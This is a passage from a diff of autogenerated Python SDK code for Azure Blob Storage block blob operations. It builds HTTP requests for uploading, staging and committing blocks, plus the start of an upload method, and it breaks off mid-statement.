kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + source_if_tags = kwargs.pop('source_if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + copy_source_blob_properties = kwargs.pop('copy_source_blob_properties', None) # type: Optional[bool] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + copy_source_tags = kwargs.pop('copy_source_tags', None) # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if source_if_tags is not None: + _header_parameters['x-ms-source-if-tags'] = _SERIALIZER.header("source_if_tags", source_if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if copy_source_blob_properties is not None: + _header_parameters['x-ms-copy-source-blob-properties'] = _SERIALIZER.header("copy_source_blob_properties", copy_source_blob_properties, 'bool') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + if copy_source_tags is not None: + _header_parameters['x-ms-copy-source-tag-option'] = _SERIALIZER.header("copy_source_tags", copy_source_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_stage_block_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "block") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + block_id = kwargs.pop('block_id') # type: str + content_length = kwargs.pop('content_length') # type: int + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['blockid'] = _SERIALIZER.query("block_id", block_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_stage_block_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "block") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + block_id = kwargs.pop('block_id') # type: str + content_length = kwargs.pop('content_length') # type: int + source_url = kwargs.pop('source_url') # type: str + source_range = kwargs.pop('source_range', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['blockid'] = _SERIALIZER.query("block_id", block_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + if source_range is not None: + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_commit_block_list_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "blocklist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_block_list_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "blocklist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + list_type = kwargs.pop('list_type', "committed") # type: Union[str, "_models.BlockListType"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + _query_parameters['blocklisttype'] = _SERIALIZER.query("list_type", list_type, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class BlockBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`block_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def upload( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Block Blob operation updates the content of an existing block blob. Updating an + existing block blob overwrites any existing metadata on the blob. Partial updates are not + supported with Put Blob; the content of the existing blob is overwritten with the content of + the new blob. To perform a partial update of the content of a block blob, use the Put Block + List operation. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.upload.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', 